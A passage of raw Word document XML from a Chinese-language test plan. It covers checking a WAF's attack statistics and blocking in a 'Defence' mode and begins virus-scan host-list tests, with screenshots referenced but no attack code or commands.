          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4939D983" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F85F6B"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3D7193A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6AB8477A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5A55C0"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63987473" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0FB5E554" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A9AFC25" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66C7F5B3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="675FEBDE" wp14:editId="65E8A0FC">
                  <wp:extent cx="4104005" cy="2063750"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="19050"/>
                  <wp:docPr id="543" name="图片 543" descr="waf_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waf_alarm"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId108"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2063750"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2029C133" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>在WAF防火墙页面，可以看到攻击数据的统计结果以及防御日志的信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE58DF3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2874C0D6" wp14:editId="22168AB1">
                  <wp:extent cx="4104005" cy="2037080"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="20320"/>
                  <wp:docPr id="544" name="图片 544" descr="w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af"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId109"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2037080"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D83ADF9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="77B55AFA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="502B8003"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2FDACB48" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D59BCC2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03701027"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7D2847DC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46AB1F70" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="_Toc32392"/>
      <w:bookmarkStart w:id="378" w:name="_Toc36487971"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到Defence状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
      <w:bookmarkEnd w:id="378"/>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6B4F99DD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE1F809"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50F53DC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>切换到Defence状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5F7C04BF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67CE9151"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7AA9CF20" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>切换到Defence状态</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，查看攻击拦截情况。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6C84698A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33CEF29F"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253E926F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WAF防火墙功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="70BF5E07" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED1BC55" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F32E39E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="55D35D93" wp14:editId="28B9AFDD">
                  <wp:extent cx="4104005" cy="2071370"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="11430"/>
                  <wp:docPr id="545" name="图片 545" descr="2017-09-25_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17-09-25_1823"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId110"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2071370"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E52FCF7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发起攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击工具的结果显示Have WAF,Fail attack!!! </w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，查看waf界面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="73D21C4C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78872BA0"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74A18757"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>waf防火墙页面可以看到攻击数据的统计信息以及日志信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4C3EF9AE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E948E03"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0418F36B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26FD6FB0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="379" w:name="_Toc36487972"/>
      <w:bookmarkStart w:id="380" w:name="_Toc36573248"/>
      <w:bookmarkStart w:id="381" w:name="_Toc36630334"/>
      <w:r w:rsidRPr="0020259A">
        <w:t>系统检测</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
      <w:bookmarkEnd w:id="380"/>
      <w:bookmarkEnd w:id="381"/>
    </w:p>
    <w:p w14:paraId="63B286DB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="_Toc36487973"/>
      <w:bookmarkStart w:id="383" w:name="_Toc36573249"/>
      <w:bookmarkStart w:id="384" w:name="_Toc36630335"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
      <w:bookmarkEnd w:id="383"/>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w14:paraId="52EC6A2E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在系统检测页面，用户可以进行病毒扫描的相关操作，比如查看主机列表，新增、删除或搜索列表中的主机，病毒查杀等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B252C2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="_Toc36487974"/>
      <w:bookmarkStart w:id="386" w:name="_Toc36573250"/>
      <w:bookmarkStart w:id="387" w:name="_Toc36630336"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
      <w:bookmarkEnd w:id="386"/>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w14:paraId="1E1DB379" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="_Toc36487975"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看主机列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>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36A02B8E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="747AD802"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27BDC7A1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4328707D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B3A5AD"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3BE7B570" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>验证页面中主机列表的显示是否正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4A8FD851" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01704D58"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4C53EBF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1E4246CF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B6A7737"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0E6C4004" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击左侧导航栏中的“系统检测”标签，进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E0946B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>页面中展示出可扫描的主机列表，以及对列表中主机的相关操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67AACB33"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769C747E" wp14:editId="6B2E035A">
                  <wp:extent cx="4104005" cy="1871980"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="7620"/>
                  <wp:docPr id="546" name="图片 546" descr="C:\Users\PC-2\AppData\Local\Temp\15294839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PC-2\AppData\Local\Temp\1529483992(1).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4104005" cy="1871980"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4973580F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA34086"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64EF3FE6"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进入系统检测页面时</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>显示</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>可扫描的主机列表。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="53804A17" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69061ACD"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2A3F2522" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA72BCB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc36487976"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>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5E39EBD4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="574809F9"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01B37FC9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
